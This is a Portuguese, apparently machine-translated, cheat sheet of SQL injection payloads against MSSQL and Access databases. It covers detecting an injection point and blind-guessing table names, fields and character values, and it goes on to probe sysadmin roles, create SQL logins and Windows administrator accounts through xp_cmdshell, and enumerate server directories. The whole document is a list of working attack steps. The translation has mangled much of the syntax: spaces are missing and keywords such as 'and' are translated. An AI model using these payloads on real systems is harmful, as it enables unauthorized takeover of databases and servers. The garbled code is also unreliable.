1. Determine se há injeção; e1 = 1; e1 = 2
2. Julgamento preliminar sobre se é mssql; AndUser> 0
3. Os parâmetros de injeção são caracteres e [condição de consulta] e '' = '
4. 'E [condição de consulta] e'%25 '=' dos parâmetros filtrados durante a pesquisa
5. JUSE JUSTO DATABASE SISTEMA
; e (selectCount (*) FromSysObjects)> 0mSSQL
; e (selectCount (*) FromsSysObjects)> 0Access
6. Adivinhe o banco de dados; e (SelectCount (*) de [Nome do banco de dados])> 0
7. Adivinhe o campo; e (SelectCount (nome do campo) do nome do banco de dados)> 0
8. Adivinhe o comprimento recorde no campo; e (selectTop1len (nome do campo) do nome do banco de dados)> 0
9. (1) Adivinhe o valor ASCII do campo (acesso)
; e (selectTop1asc (MID (Nome do campo, 1, 1)) do nome do banco de dados)> 0
(2) Adivinhe o valor ASCII do campo (MSSQL)
; e (selectTop1Unicode (substring (nome do campo, 1, 1)) do nome do banco de dados)> 0
10. Estrutura de permissão de teste (msSQL)
; e1 = (selectis_srvrolember ('sysadmin'));-
; e1 = (selectIs_srvrolember ('serverAdmin');--
; e1 = (selectIs_srvrolemEmber ('Setupadmin'));-
; e1 = (selectis_srvrolember ('SecurityAdmin'));-
; And1 = (selectis_srvrolember ('diskadmin');--
; e1 = (selectis_srvrolember ('Bulkadmin'));-
; e1 = (selectIs_member ('db_owner'));-
11. Adicione a conta do MSSQL e do sistema
; Execmaster.dbo.sp_addloginusername;--
; execmaster.dbo.sp_passwordNull, nome de usuário, senha;-
; execmaster.dbo.sp_addsrvrolemembersysadminUsername;-
; Execmaster.dbo.xp_cmdshell'NetUserUserNamePassword
/Estações de trabalho:*/Times: all/wastwrochg: yes/senha: sim/ativo: sim/add ';---
; Execmaster.dbo.xp_cmdshell'NetUserUserNamePassword/add ';-
; Execmaster.dbo.xp_cmdshell'netlocalgroupAdministratorsUserName/add ';-
12. (1) Transfira o diretório
;
; insertdirsexecmaster.dbo.xp_dirtree'c:/'
; e (selectTop1PathsFromdirs)> 0
; e (selectTop1PathsFromdirswherephsnotin ('caminhos obtidos da etapa anterior'))>)
(2) atravessar o diretório
; CreateTableTemp (idnvarchar (255), num1nvarchar (255), num2Nvarchar (255), num3Nvarchar (255));-
; inserttempexecmaster.dbo.xp_availablemedia; -Tere todas as unidades atuais
; insertIntotemp (id) execmaster.dbo.xp_subdirs'c:/';-Obtenha uma lista de subdiretório
; insertIntotemp (id, num1) execmaster.dbo.xp_dirtree'c:/';-Obtenha a estrutura da árvore do diretório de todos os subdiretos